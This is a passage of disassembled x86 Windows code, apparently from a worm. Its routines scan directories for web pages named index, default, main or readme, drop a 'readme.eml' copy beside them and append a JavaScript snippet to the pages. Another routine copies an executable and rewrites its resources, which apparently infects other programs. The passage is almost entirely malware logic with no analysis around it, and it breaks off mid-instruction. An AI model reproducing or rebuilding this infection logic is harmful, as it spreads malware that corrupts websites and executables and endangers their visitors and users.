36173413 cmp eax, 0FFFFFFFFh 36173416 mov [esp+15Ch+var_150], eax 3617341A jnz short loc_36173423 3617341C xor edi, edi 3617341E jmp loc_361735DE 36173423 ; ─────────────────────────────────────────────────────────────────────────── 36173423 36173423 loc_36173423: ; CODE XREF: sub_3617339F+7Bj 36173423 lea eax, [esp+15Ch+var_120] 36173427 push ebp 36173428 push eax 36173429 call ds:_strlwr 3617342F lea eax, [esp+164h+var_120] 36173433 mov [esp+164h+var_164], offset dot ; "." 3617343A push eax 3617343B call _strcmp 36173440 mov ebp, ds:strstr 36173446 pop ecx 36173447 pop ecx 36173448 test eax, eax 3617344A 3617344A loc_3617344A: ; CODE XREF: sub_3617339F+22Cj 3617344A jz loc_36173598 36173450 lea eax, [esp+160h+var_120] 36173454 push offset a__ ; ".." 36173459 push eax 3617345A call _strcmp 3617345F pop ecx 36173460 test eax, eax 36173462 pop ecx 36173463 jz loc_36173598 36173469 test [esp+160h+var_14C], 10h 3617346E jz short loc_361734B3 36173470 push edi 36173471 push [esp+164h+var_8] 36173478 push esi 36173479 call ds:strncpy 3617347F push esi 36173480 call _strlen 36173485 mov ecx, edi 36173487 sub ecx, eax 36173489 push ecx 3617348A push offset asc_36179474 ; "\\" 3617348F push esi 36173490 call ebx ; strncat 36173492 push esi 36173493 call _strlen 36173498 mov ecx, edi 3617349A sub ecx, eax 3617349C lea eax, [esp+180h+var_120] 361734A0 push ecx 361734A1 push eax 361734A2 push esi 361734A3 call ebx ; strncat 361734A5 push esi 361734A6 call sub_3617339F 361734AB add esp, 30h 361734AE jmp loc_36173598 361734B3 ; ─────────────────────────────────────────────────────────────────────────── 361734B3 361734B3 loc_361734B3: ; CODE XREF: sub_3617339F+CFj 361734B3 lea eax, [esp+160h+var_120] 361734B7 push eax 361734B8 call _strlen 361734BD cmp eax, 4 361734C0 pop ecx 361734C1 jbe loc_36173598 361734C7 lea eax, [esp+160h+var_120] 361734CB push offset dot_htm ; ".htm" 361734D0 push eax 361734D1 call _strlen 361734D6 pop ecx 361734D7 lea eax, [esp+eax+164h+var_124] 361734DB push eax 361734DC call _strcmp 361734E1 pop ecx 361734E2 test eax, eax 361734E4 pop ecx 361734E5 jz short loc_36173527 361734E7 lea eax, [esp+160h+var_120] 361734EB push offset asp_ext ; ".asp" 361734F0 push eax 361734F1 call _strlen 361734F6 pop ecx 361734F7 lea eax, [esp+eax+164h+var_124] 361734FB push eax 361734FC call _strcmp 36173501 pop ecx 36173502 test eax, eax 36173504 pop ecx 36173505 jz short loc_36173527 36173507 lea eax, [esp+160h+var_120] 3617350B push offset html_ext ; "html" 36173510 push eax 36173511 call _strlen 36173516 pop ecx 36173517 lea eax, [esp+eax+164h+var_124] 3617351B push eax 3617351C call _strcmp 36173521 pop ecx 36173522 test eax, eax 36173524 pop ecx 36173525 jnz short loc_36173598 36173527 36173527 loc_36173527: ; CODE XREF: sub_3617339F+146j 36173527 ; sub_3617339F+166j 36173527 lea eax, [esp+160h+var_120] 3617352B push offset default ; "default" 36173530 push eax 36173531 call ebp ; strstr 36173533 pop ecx 36173534 test eax, eax 36173536 pop ecx 36173537 jnz short loc_36173585 36173539 lea eax, [esp+160h+var_120] 3617353D push offset index ; "index" 36173542 push eax 36173543 call ebp ; strstr 36173545 pop ecx 36173546 test eax, eax 36173548 pop ecx 36173549 jnz short loc_36173585 3617354B lea eax, [esp+160h+var_120] 3617354F push offset main ; "main" 36173554 push eax 36173555 call ebp ; strstr 36173557 pop ecx 36173558 test eax, eax 3617355A pop ecx 3617355B jnz short loc_36173585 3617355D lea eax, [esp+160h+var_120] 36173561 push offset readme ; "readme" 36173566 push eax 36173567 call ebp ; strstr 36173569 pop ecx 3617356A test eax, eax 3617356C pop ecx 3617356D jnz short loc_36173585 3617356F call ds:rand 36173575 imul eax, 64h 36173578 cdq 36173579 mov ecx, 7FFFh 3617357E idiv ecx 36173580 cmp eax, 62h 36173583 jle short loc_36173598 36173585 36173585 loc_36173585: ; CODE XREF: sub_3617339F+198j 36173585 ; sub_3617339F+1AAj ... 36173585 lea eax, [esp+160h+var_120] 36173589 push eax 3617358A push [esp+164h+var_8] 36173591 call sub_36173618 36173596 pop ecx 36173597 pop ecx 36173598 36173598 loc_36173598: ; CODE XREF: sub_3617339F+ABj 36173598 ; sub_3617339F+C4j ... 36173598 lea eax, [esp+160h+var_14C] 3617359C push eax 3617359D push [esp+164h+var_150] 361735A1 call ds:FindNextFileA 361735A7 test eax, eax 361735A9 jz short loc_361735D0 361735AB lea eax, [esp+160h+var_120] 361735AF push eax 361735B0 call ds:_strlwr 361735B6 lea eax, [esp+164h+var_120] 361735BA mov [esp+164h+var_164], offset dot ; "." 361735C1 push eax 361735C2 call _strcmp 361735C7 pop ecx 361735C8 pop ecx 361735C9 test eax, eax 361735CB jmp loc_3617344A 361735D0 ; ─────────────────────────────────────────────────────────────────────────── 361735D0 361735D0 loc_361735D0: ; CODE XREF: sub_3617339F+20Aj 361735D0 push [esp+160h+var_150] 361735D4 call ds:FindClose 361735DA push 1 361735DC pop edi 361735DD pop ebp 361735DE 361735DE loc_361735DE: ; CODE XREF: sub_3617339F+7Fj 361735DE push esi 361735DF push 0 361735E1 push dword_3617ACB4 361735E7 call dword_3617AC70 361735ED mov eax, edi 361735EF 361735EF loc_361735EF: ; CODE XREF: sub_3617339F+38j 361735EF pop edi 361735F0 pop esi 361735F1 pop ebx 361735F2 add esp, 144h 361735F8 retn 361735F8 sub_3617339F endp ; sp = -18h 361735F8 361735F9 361735F9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361735F9 361735F9 361735F9 sub_361735F9 proc near ; CODE XREF: sub_3617339F+11p 361735F9 361735F9 arg_0 = dword ptr 4 361735F9 361735F9 mov ecx, [esp+arg_0] 361735FD xor eax, eax 361735FF test ecx, ecx 36173601 jnz short loc_36173604 36173603 36173603 locret_36173603: ; CODE XREF: sub_361735F9+11j 36173603 retn 36173604 ; ─────────────────────────────────────────────────────────────────────────── 36173604 36173604 loc_36173604: ; CODE XREF: sub_361735F9+8j 36173604 mov edx, ecx 36173606 mov cl, [ecx] 36173608 36173608 loc_36173608: ; CODE XREF: sub_361735F9+1Dj 36173608 test cl, cl 3617360A jz short locret_36173603 3617360C cmp cl, 5Ch 3617360F jnz short loc_36173612 36173611 inc eax 36173612 36173612 loc_36173612: ; CODE XREF: sub_361735F9+16j 36173612 mov cl, [edx+1] 36173615 inc edx 36173616 jmp short loc_36173608 36173616 sub_361735F9 endp 36173616 36173618 36173618 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173618 36173618 ; Attributes: bp-based frame 36173618 36173618 sub_36173618 proc near ; CODE XREF: sub_3617339F+1F2p 36173618 36173618 var_28 = byte ptr -28h 36173618 var_F = byte ptr -0Fh 36173618 var_8 = dword ptr -8 36173618 var_4 = dword ptr -4 36173618 arg_0 = dword ptr 8 36173618 arg_4 = dword ptr 0Ch 36173618 36173618 push ebp 36173619 mov ebp, esp 3617361B sub esp, 28h 3617361E push esi 3617361F and [ebp+var_8], 0 36173623 mov esi, 400h 36173628 push edi 36173629 push esi 3617362A push 8 3617362C push dword_3617ACB4 36173632 call dword_3617AC74 36173638 mov edi, eax 3617363A test edi, edi 3617363C mov [ebp+var_4], edi 3617363F jz loc_361737C5 36173645 push ebx 36173646 mov ebx, ds:strncpy 3617364C push esi 3617364D push [ebp+arg_0] 36173650 push edi 36173651 call ebx ; strncpy 36173653 push edi 36173654 call sub_3617186E 36173659 push [ebp+arg_0] 3617365C call _strlen 36173661 mov ecx, esi 36173663 sub ecx, eax 36173665 push ecx 36173666 push offset bs_readme_eml ; "\\readme.eml" 3617366B push edi 3617366C mov edi, ds:strncat 36173672 call edi ; strncat 36173674 add esp, 20h 36173677 push 0 36173679 push [ebp+var_4] 3617367C push offset byte_3617C8B8 36173681 call ds:CopyFileA 36173687 push esi 36173688 push [ebp+arg_0] 3617368B push [ebp+var_4] 3617368E call ebx ; strncpy 36173690 mov ebx, [ebp+var_4] 36173693 push ebx 36173694 call sub_3617186E 36173699 push [ebp+arg_0] 3617369C call _strlen 361736A1 sub esi, eax 361736A3 push esi 361736A4 push offset asc_36179474 ; "\\" 361736A9 push ebx 361736AA call edi ; strncat 361736AC push [ebp+arg_0] 361736AF call _strlen 361736B4 mov ecx, 3FFh 361736B9 sub ecx, eax 361736BB push ecx 361736BC push [ebp+arg_4] 361736BF push ebx 361736C0 call edi ; strncat 361736C2 add esp, 30h 361736C5 push 80h 361736CA push ebx 361736CB call ds:SetFileAttributesA 361736D1 xor esi, esi 361736D3 push esi 361736D4 push esi 361736D5 push 3 361736D7 push esi 361736D8 push 3 361736DA push 0C0000000h 361736DF push ebx 361736E0 call ds:CreateFileA 361736E6 mov edi, eax 361736E8 cmp edi, 0FFFFFFFFh 361736EB mov [ebp+arg_0], edi 361736EE jnz short loc_361736F7 361736F0 xor edi, edi 361736F2 jmp loc_361737B2 361736F7 ; ─────────────────────────────────────────────────────────────────────────── 361736F7 361736F7 loc_361736F7: ; CODE XREF: sub_36173618+D6j 361736F7 push esi 361736F8 push edi 361736F9 call ds:GetFileSize 361736FF cmp eax, 0FFFFFFFFh 36173702 jz loc_361737A7 36173708 cmp eax, 800000h 3617370D ja loc_361737A7 36173713 cmp eax, 19h 36173716 jb loc_361737A7 3617371C mov ebx, ds:SetFilePointer 36173722 push 2 36173724 push esi 36173725 push 0FFFFFFE7h 36173727 push edi 36173728 call ebx ; SetFilePointer 3617372A cmp eax, 0FFFFFFFFh 3617372D jz short loc_361737A7 3617372F lea eax, [ebp+var_8] 36173732 push esi 36173733 push eax 36173734 lea eax, [ebp+var_28] 36173737 push 19h 36173739 push eax 3617373A push [ebp+arg_0] 3617373D call ds:ReadFile 36173743 test eax, eax 36173745 jz short loc_361737A7 36173747 and [ebp+var_F], 0 3617374B lea eax, [ebp+var_28] 3617374E push eax 3617374F call ds:_strlwr 36173755 mov edi, offset JS_window ; "\r\n<html><script language=\"JavaScript\">w"... 3617375A push edi 3617375B call _strlen 36173760 mov ecx, edi 36173762 sub ecx, 19h 36173765 add eax, ecx 36173767 push eax 36173768 lea eax, [ebp+var_28] 3617376B push eax 3617376C call _strcmp 36173771 add esp, 10h 36173774 test eax, eax 36173776 jnz short loc_3617377D 36173778 36173778 loc_36173778: ; CODE XREF: sub_36173618+18Dj 36173778 push 1 3617377A pop edi 3617377B jmp short loc_361737A9 3617377D ; ─────────────────────────────────────────────────────────────────────────── 3617377D 3617377D loc_3617377D: ; CODE XREF: sub_36173618+15Ej 3617377D push 2 3617377F push esi 36173780 push esi 36173781 push [ebp+arg_0] 36173784 call ebx ; SetFilePointer 36173786 cmp eax, 0FFFFFFFFh 36173789 jz short loc_361737A7 3617378B lea eax, [ebp+var_8] 3617378E push esi 3617378F push eax 36173790 push edi 36173791 mov [ebp+var_8], esi 36173794 call _strlen 36173799 pop ecx 3617379A push eax 3617379B push edi 3617379C push [ebp+arg_0] 3617379F call ds:WriteFile 361737A5 jmp short loc_36173778 361737A7 ; ─────────────────────────────────────────────────────────────────────────── 361737A7 361737A7 loc_361737A7: ; CODE XREF: sub_36173618+EAj 361737A7 ; sub_36173618+F5j ... 361737A7 xor edi, edi 361737A9 361737A9 loc_361737A9: ; CODE XREF: sub_36173618+163j 361737A9 push [ebp+arg_0] 361737AC call ds:CloseHandle 361737B2 361737B2 loc_361737B2: ; CODE XREF: sub_36173618+DAj 361737B2 push [ebp+var_4] 361737B5 push esi 361737B6 push dword_3617ACB4 361737BC call dword_3617AC70 361737C2 mov eax, edi 361737C4 pop ebx 361737C5 361737C5 loc_361737C5: ; CODE XREF: sub_36173618+27j 361737C5 pop edi 361737C6 pop esi 361737C7 leave 361737C8 retn 361737C8 sub_36173618 endp 361737C8 361737C9 361737C9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361737C9 361737C9 ; Attributes: bp-based frame 361737C9 361737C9 sub_361737C9 proc near ; CODE XREF: sub_36171F05+89p 361737C9 361737C9 var_40 = byte ptr -40h 361737C9 361737C9 push ebp 361737CA mov ebp, esp 361737CC sub esp, 40h 361737CF push ebx 361737D0 push esi 361737D1 push edi 361737D2 lea eax, [ebp+var_40] 361737D5 push 40h 361737D7 push eax 361737D8 xor edi, edi 361737DA xor ebx, ebx 361737DC call dword_3617AC1C 361737E2 lea eax, [ebp+var_40] 361737E5 push eax 361737E6 call dword_3617AC20 361737EC mov esi, eax 361737EE mov eax, [esi+0Ch] 361737F1 cmp [eax], edi 361737F3 jz short loc_36173801 361737F5 361737F5 loc_361737F5: ; CODE XREF: sub_361737C9+32j 361737F5 add eax, 4 361737F8 inc ebx 361737F9 cmp [eax], edi 361737FB jnz short loc_361737F5 361737FD cmp ebx, edi 361737FF jnz short loc_36173844 36173801 36173801 loc_36173801: ; CODE XREF: sub_361737C9+2Aj 36173801 mov dword_3617D658, 1 3617380B 3617380B loc_3617380B: ; CODE XREF: sub_361737C9+9Bj 3617380B ; sub_361737C9+9Fj 3617380B push dword_3617D654 36173811 call dword_3617AC24 36173817 push 13h 36173819 push eax 3617381A push offset byte_3617D640 3617381F call ds:strncpy 36173825 add esp, 0Ch 36173828 push edi 36173829 push edi 3617382A push edi 3617382B call ds:CreateMutexA 36173831 xor ecx, ecx 36173833 cmp eax, edi 36173835 setnz cl 36173838 pop edi 36173839 mov dword_3617D65C, eax 3617383E pop esi 3617383F mov eax, ecx 36173841 pop ebx 36173842 leave 36173843 retn 36173844 ; ─────────────────────────────────────────────────────────────────────────── 36173844 36173844 loc_36173844: ; CODE XREF: sub_361737C9+36j 36173844 mov dword_3617D658, edi 3617384A call ds:rand 36173850 imul eax, ebx 36173853 cdq 36173854 mov ecx, 7FFFh 36173859 idiv ecx 3617385B mov edx, [esi+0Ch] 3617385E xor ebx, ebx 36173860 36173860 loc_36173860: ; CODE XREF: sub_361737C9+ADj 36173860 mov ecx, [edx] 36173862 cmp ecx, edi 36173864 jz short loc_3617380B 36173866 cmp ebx, eax 36173868 jg short loc_3617380B 3617386A mov ecx, [ecx] 3617386C add edx, 4 3617386F mov dword_3617D654, ecx 36173875 inc ebx 36173876 jmp short loc_36173860 36173876 sub_361737C9 endp 36173876 36173878 36173878 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173878 36173878 36173878 sub_36173878 proc near ; CODE XREF: sub_36173DCF+194p 36173878 ; sub_36174E10+CDp 36173878 36173878 var_44C = dword ptr -44Ch 36173878 var_448 = dword ptr -448h 36173878 var_444 = dword ptr -444h 36173878 var_440 = dword ptr -440h 36173878 var_43C = dword ptr -43Ch 36173878 var_438 = dword ptr -438h 36173878 var_434 = dword ptr -434h 36173878 var_430 = dword ptr -430h 36173878 var_42C = dword ptr -42Ch 36173878 var_428 = dword ptr -428h 36173878 var_424 = byte ptr -424h 36173878 var_420 = byte ptr -420h 36173878 var_418 = byte ptr -418h 36173878 var_410 = byte ptr -410h 36173878 var_40C = byte ptr -40Ch 36173878 var_408 = byte ptr -408h 36173878 var_400 = byte ptr -400h 36173878 var_14 = dword ptr -14h 36173878 arg_0 = dword ptr 4 36173878 36173878 sub esp, 44Ch 3617387E push ebx 3617387F push ebp 36173880 mov ebp, [esp+454h+arg_0] 36173887 push esi 36173888 push edi 36173889 xor edi, edi 3617388B push ebp 3617388C mov [esp+460h+var_430], edi 36173890 mov [esp+460h+var_434], edi 36173894 mov [esp+460h+var_44C], 2E8h 3617389C mov [esp+460h+var_43C], edi 361738A0 xor ebx, ebx 361738A2 mov [esp+460h+var_444], edi 361738A6 mov [esp+460h+var_440], edi 361738AA mov [esp+460h+var_448], edi 361738AE call _strlen 361738B3 cmp eax, 0Ch 361738B6 pop ecx 361738B7 jl loc_36173D07 361738BD lea eax, [eax+ebp-0Ch] 361738C1 push offset WINZIP32_EXE ; "winzip32.exe" 361738C6 push eax 361738C7 call _strcmp 361738CC pop ecx 361738CD test eax, eax 361738CF pop ecx 361738D0 jz loc_36173D07 361738D6 push edi 361738D7 push edi 361738D8 push 3 361738DA push edi 361738DB push 1 361738DD push 0C0000000h 361738E2 push ebp 361738E3 call ds:CreateFileA 361738E9 mov esi, eax 361738EB cmp esi, 0FFFFFFFFh 361738EE jz loc_36173D07 361738F4 push edi 361738F5 push esi 361738F6 call ds:GetFileSize 361738FC cmp eax, 800000h 36173901 jbe short loc_3617390F 36173903 36173903 loc_36173903: ; CODE XREF: sub_36173878+A8j 36173903 ; sub_36173878+C0j 36173903 push esi 36173904 36173904 loc_36173904: ; CODE XREF: sub_36173878+C8j 36173904 ; sub_36173878+406j 36173904 call ds:CloseHandle 3617390A jmp loc_36173D07 3617390F ; ─────────────────────────────────────────────────────────────────────────── 3617390F 3617390F loc_3617390F: ; CODE XREF: sub_36173878+89j 3617390F push edi 36173910 push edi 36173911 push 0D7h 36173916 push esi 36173917 call ds:SetFilePointer 3617391D cmp eax, 0FFFFFFFFh 36173920 jz short loc_36173903 36173922 lea eax, [esp+45Ch+var_424] 36173926 push edi 36173927 push eax 36173928 lea eax, [esp+464h+var_420] 3617392C push 1 3617392E push eax 3617392F push esi 36173930 call ds:ReadFile 36173936 test eax, eax 36173938 jz short loc_36173903 3617393A cmp [esp+45Ch+var_420], 7Fh 3617393F push esi 36173940 jz short loc_36173904 36173942 call ds:CloseHandle 36173948 lea eax, [esp+45Ch+var_400] 3617394C push eax 3617394D push edi 3617394E push offset mep ; "mep" 36173953 push offset byte_3617B4B8 36173958 call ds:GetTempFileNameA 3617395E test eax, eax 36173960 jz loc_36173D07 36173966 lea eax, [esp+45Ch+var_400] 3617396A push eax 3617396B call ds:DeleteFileA 36173971 lea eax, [esp+45Ch+var_400] 36173975 push offset dot_exe ; ".exe" 3617397A push eax 3617397B call _strcat 36173980 pop ecx 36173981 lea eax, [esp+460h+var_400] 36173985 pop ecx 36173986 push edi 36173987 push eax 36173988 push offset byte_3617C0B8 3617398D call ds:CopyFileA 36173993 test eax, eax 36173995 jz loc_36173D07 3617399B lea eax, [esp+45Ch+var_400] 3617399F push 80h 361739A4 push eax 361739A5 call ds:SetFileAttributesA 361739AB push 2 361739AD push edi 361739AE push ebp 361739AF call ds:LoadLibraryExA 361739B5 mov esi, eax 361739B7 cmp esi, edi 361739B9 mov [esp+45Ch+var_438], esi 361739BD jz loc_36173DB7 361739C3 lea eax, [esp+45Ch+var_400] 361739C7 push edi 361739C8 push eax 361739C9 call ds:BeginUpdateResourceA 361739CF mov ebp, eax 361739D1 xor edi, edi 361739D3 cmp ebp, edi 361739D5 mov [esp+45Ch+var_428], ebp 361739D9 jnz short loc_361739E7 361739DB push esi 361739DC call ds:FreeLibrary 361739E2 jmp loc_36173DB7 361739E7 ; ─────────────────────────────────────────────────────────────────────────── 361739E7 361739E7 loc_361739E7: ; CODE XREF: sub_36173878+161j 361739E7 mov [esp+45Ch+var_42C], edi 361739EB 361739EB loc_361739EB: ; CODE XREF: sub_36173878+266j 361739EB movzx eax, word ptr [esp+45Ch+var_42C] 361739F0 push 3 361739F2 push eax 361739F3 push [esp+464h+var_438] 361739F7 call ds:FindResourceA 361739FD mov esi, eax 361739FF test esi, esi 36173A01 jz loc_36173AD2 36173A07 push esi 36173A08 push [esp+460h+var_438] 36173A0C call ds:LoadResource 36173A12 test eax, eax 36173A14 jz loc_36173AD2 36173A1A push eax 36173A1B call ds:LockResource 36173A21 mov edi, eax 36173A23 test edi, edi 36173A25 jz loc_36173AD2 36173A2B push esi 36173A2C push [esp+460h+var_438] 36173A30 call ds:SizeofResource 36173A36 test eax, eax 36173A38 jz loc_36173AD2 36173A3E mov ecx, 128h 36173A43 cmp eax, ecx 36173A45 jnz short loc_36173A58 36173A47 cmp [esp+45Ch+var_43C], 0 36173A4C jnz loc_36173AD2 36173A52 mov [esp+45Ch+var_43C], edi 36173A56 jmp short loc_36173AD2 36173A58 ; ─────────────────────────────────────────────────────────────────────────── 36173A58 36173A58 loc_36173A58: ; CODE XREF: sub_36173878+1CDj 36173A58 cmp eax, 2E8h 36173A5D jnz short loc_36173A67 36173A5F test ebx, ebx 36173A61 jnz short loc_36173AD2 36173A63 mov ebx, edi 36173A65 jmp short loc_36173AD2 36173A67 ; ─────────────────────────────────────────────────────────────────────────── 36173A67 36173A67 loc_36173A67: ; CODE XREF: sub_36173878+1E5j 36173A67 cmp eax, 8A8h 36173A6C jnz short loc_36173A7B 36173A6E cmp [esp+45Ch+var_444], 0 36173A73 jnz short loc_36173AD2 36173A75 mov [esp+45Ch+var_444], edi 36173A79 jmp short loc_36173AD2 36173A7B ; ─────────────────────────────────────────────────────────────────────────── 36173A7B 36173A7B loc_36173A7B: ; CODE XREF: sub_36173878+1F4j 36173A7B cmp eax, 0EA8h 36173A80 jnz short loc_36173A8F 36173A82 cmp [esp+45Ch+var_440], 0 36173A87 jnz short loc_36173AD2 36173A89 mov [esp+45Ch+var_440], edi 36173A8D jmp short loc_36173AD2 36173A8F ; ─────────────────────────────────────────────────────────────────────────── 36173A8F 36173A8F loc_36173A8F: ; CODE XREF: sub_36173878+208j 36173A8F cmp eax, 130h 36173A94 jnz short loc_36173AA3 36173A96 cmp [esp+45Ch+var_448], 0 36173A9B jnz short loc_36173AD2 36173A9D mov [esp+45Ch+var_448], edi 36173AA1 jmp short loc_36173AD2 36173AA3 ; ─────────────────────────────────────────────────────────────────────────── 36173AA3 36173AA3 loc_36173AA3: ; CODE XREF: sub_36173878+21Cj 36173AA3 cmp [esp+45Ch+var_430], 0 36173AA8 jnz short loc_36173AB2 36173AAA mov [esp+45Ch+var_430], edi 36173AAE mov [esp+45Ch+var_434], eax 36173AB2 36173AB2 loc_36173AB2: ; CODE XREF: sub_36173878+230j 36173AB2 test ebx, ebx 36173AB4 jz short loc_36173AD2 36173AB6 cmp [esp+45Ch+var_43C], 0 36173ABB jz short loc_36173AD2 36173ABD cmp [esp+45Ch+var_444], 0 36173AC2 jz short loc_36173AD2 36173AC4 cmp [esp+45Ch+var_440], 0 36173AC9 jz short loc_36173AD2 36173ACB cmp [esp+45Ch+var_448], 0 36173AD0 jnz short loc_36173AE9 36173AD2 36173AD2 loc_36173AD2: ; CODE XREF: sub_36173878+189j 36173AD2 ; sub_36173878+19Cj ... 36173AD2 inc [esp+45Ch+var_42C] 36173AD6 cmp [esp+45Ch+var_42C], 80h 36173ADE jl loc_361739EB 36173AE4 mov ecx, 128h 36173AE9 36173AE9 loc_36173AE9: ; CODE XREF: sub_36173878+258j 36173AE9 xor edx, edx 36173AEB cmp [esp+45Ch+var_430], edx 36173AEF jnz short loc_36173B2D 36173AF1 cmp ebx, edx 36173AF3 jnz loc_36173B85 36173AF9 mov eax, [esp+45Ch+var_43C] 36173AFD cmp eax, edx 36173AFF jnz short loc_36173B3F 36173B01 cmp [esp+45Ch+var_444], edx 36173B05 jnz short loc_36173B3F 36173B07 cmp [esp+45Ch+var_440], edx 36173B0B jnz short loc_36173B45 36173B0D cmp [esp+45Ch+var_448], edx 36173B11 jnz short loc_36173B79 36173B13 lea eax, [esp+45Ch+var_400] 36173B17 push eax 36173B18 call ds:DeleteFileA 36173B1E push [esp+45Ch+var_438] 36173B22 call ds:FreeLibrary 36173B28 jmp loc_36173D07 36173B2D ; ─────────────────────────────────────────────────────────────────────────── 36173B2D 36173B2D loc_36173B2D: ; CODE XREF: sub_36173878+277j 36173B2D cmp ebx, edx 36173B2F jnz short loc_36173B85 36173B31 mov eax, [esp+45Ch+var_434] 36173B35 mov ebx, [esp+45Ch+var_430] 36173B39 mov [esp+45Ch+var_44C], eax 36173B3D jmp short loc_36173B85 36173B3F ; ─────────────────────────────────────────────────────────────────────────── 36173B3F 36173B3F loc_36173B3F: ; CODE XREF: sub_36173878+287j 36173B3F ; sub_36173878+28Dj 36173B3F cmp [esp+45Ch+var_440], edx 36173B43 jz short loc_36173B53 36173B45 36173B45 loc_36173B45: ; CODE XREF: sub_36173878+293j 36173B45 mov ebx, [esp+45Ch+var_440] 36173B49 mov [esp+45Ch+var_44C], 0EA8h 36173B51 jmp short loc_36173B85 36173B53 ; ─────────────────────────────────────────────────────────────────────────── 36173B53 36173B53 loc_36173B53: ; CODE XREF: sub_36173878+2CBj 36173B53 cmp [esp+45Ch+var_444], edx 36173B57 jz short loc_36173B67 36173B59 mov ebx, [esp+45Ch+var_444] 36173B5D mov [esp+45Ch+var_44C], 8A8h 36173B65 jmp short loc_36173B85 36173B67 ; ─────────────────────────────────────────────────────────────────────────── 36173B67 36173B67 loc_36173B67: ; CODE XREF: sub_36173878+2DFj 36173B67 cmp eax, edx 36173B69 jz short loc_36173B73 36173B6B mov ebx, eax 36173B6D mov [esp+45Ch+var_44C], ecx 36173B71 jmp short loc_36173B85 36173B73 ; ─────────────────────────────────────────────────────────────────────────── 36173B73 36173B73 loc_36173B73: ; CODE XREF: sub_36173878+2F1j 36173B73 cmp [esp+45Ch+var_448], edx 36173B77 jz short loc_36173B92 36173B79 36173B79 loc_36173B79: ; CODE XREF: sub_36173878+299j 36173B79 mov ebx, [esp+45Ch+var_448] 36173B7D mov [esp+45Ch+var_44C], 130h 36173B85 36173B85 loc_36173B85: ; CODE XREF: sub_36173878+27Bj 36173B85 ; sub_36173878+2B7j ... 36173B85 cmp [esp+45Ch+var_43C], edx 36173B89 jz short loc_36173B92 36173B8B push ecx 36173B8C push [esp+460h+var_43C] 36173B90 jmp short loc_36173B97 36173B92 ; ─────────────────────────────────────────────────────────────────────────── 36173B92 36173B92 loc_36173B92: ; CODE XREF: sub_36173878+2FFj 36173B92 ; sub_36173878+311j 36173B92 push [esp+45Ch+var_44C] 36173B96 push ebx 36173B97 36173B97 loc_36173B97: ; CODE XREF: sub_36173878+318j 36173B97 mov esi, ds:UpdateResourceA 36173B9D mov edi, 804h 36173BA2 push edi 36173BA3 push 1 36173BA5 push 3 36173BA7 push ebp 36173BA8 call esi ; UpdateResourceA 36173BAA push [esp+45Ch+var_44C] 36173BAE push ebx 36173BAF push edi 36173BB0 push 2 36173BB2 push 3 36173BB4 push ebp 36173BB5 call esi ; UpdateResourceA 36173BB7 cmp [esp+45Ch+var_444], 0 36173BBC jz short loc_36173BC9 36173BBE push 8A8h 36173BC3 push [esp+460h+var_444] 36173BC7 jmp short loc_36173BCE 36173BC9 ; ─────────────────────────────────────────────────────────────────────────── 36173BC9 36173BC9 loc_36173BC9: ; CODE XREF: sub_36173878+344j 36173BC9 push [esp+45Ch+var_44C] 36173BCD push ebx 36173BCE 36173BCE loc_36173BCE: ; CODE XREF: sub_36173878+34Fj 36173BCE push edi 36173BCF push 3 36173BD1 push 3 36173BD3 push ebp 36173BD4 call esi ; UpdateResourceA 36173BD6 cmp [esp+45Ch+var_440], 0 36173BDB jz short loc_36173BE8 36173BDD push 0EA8h 36173BE2 push [esp+460h+var_440] 36173BE6 jmp short loc_36173BED 36173BE8 ; ─────────────────────────────────────────────────────────────────────────── 36173BE8 36173BE8 loc_36173BE8: ; CODE XREF: sub_36173878+363j 36173BE8 push [esp+45Ch+var_44C] 36173BEC push ebx 36173BED 36173BED loc_36173BED: ; CODE XREF: sub_36173878+36Ej 36173BED push edi 36173BEE push 4 36173BF0 push 3 36173BF2 push ebp 36173BF3 call esi ; UpdateResourceA 36173BF5 cmp [esp+45Ch+var_448], 0 36173BFA jz short loc_36173C07 36173BFC push 130h 36173C01 push [esp+460h+var_448] 36173C05 jmp short loc_36173C0C 36173C07 ; ─────────────────────────────────────────────────────────────────────────── 36173C07 36173C07 loc_36173C07: ; CODE XREF: sub_36173878+382j 36173C07 push [esp+45Ch+var_44C] 36173C0B push ebx 36173C0C 36173C0C loc_36173C0C: ; CODE XREF: sub_36173878+38Dj 36173C0C push edi 36173C0D push 5 36173C0F push 3 36173C11 push ebp 36173C12 call esi ; UpdateResourceA 36173C14 push [esp+45Ch+var_438] 36173C18 call ds:FreeLibrary 36173C1E xor ebp, ebp 36173C20 push ebp 36173C21 push ebp 36173C22 push 3 36173C24 push ebp 36173C25 push 1 36173C27 push 80000000h 36173C2C push [esp+474h+arg_0] 36173C33 call ds:CreateFileA 36173C39 mov ebx, eax 36173C3B push ebp 36173C3C push ebx 36173C3D call ds:GetFileSize 36173C43 mov ebp, eax 36173C45 cmp ebp, 0FFFFFFFFh 36173C48 jnz short loc_36173C58 36173C4A push ebx 36173C4B call ds:CloseHandle 36173C51 xor edi, edi 36173C53 jmp loc_36173DB7 36173C58 ; ─────────────────────────────────────────────────────────────────────────── 36173C58 36173C58 loc_36173C58: ; CODE XREF: sub_36173878+3D0j 36173C58 lea eax, [ebp+10h] 36173C5B push eax 36173C5C push 8 36173C5E push dword_3617ACB4 36173C64 call dword_3617AC74 36173C6A test eax, eax 36173C6C mov [esp+468h+var_440], eax 36173C70 jnz short loc_36173C83 36173C72 lea eax, [esp+468h+var_40C] 36173C76 push eax 36173C77 call ds:DeleteFileA 36173C7D push ebx 36173C7E jmp loc_36173904 36173C83 ; ─────────────────────────────────────────────────────────────────────────── 36173C83 36173C83 loc_36173C83: ; CODE XREF: sub_36173878+3F8j 36173C83 lea ecx, [esp+468h+var_430] 36173C87 push 0 36173C89 push ecx 36173C8A push ebp 36173C8B push eax 36173C8C push ebx 36173C8D call ds:ReadFile 36173C93 test eax, eax 36173C95 jnz short loc_36173CB1 36173C97 lea eax, [esp+468h+var_40C] 36173C9B push eax 36173C9C call ds:DeleteFileA 36173CA2 push ebx 36173CA3 call ds:CloseHandle 36173CA9 push [esp+468h+var_440] 36173CAD 36173CAD loc_36173CAD: ; CODE XREF: sub_36173878+463j 36173CAD push 0 36173CAF jmp short loc_36173CFB 36173CB1 ; ─────────────────────────────────────────────────────────────────────────── 36173CB1 36173CB1 loc_36173CB1: ; CODE XREF: sub_36173878+41Dj 36173CB1 push ebx 36173CB2 mov 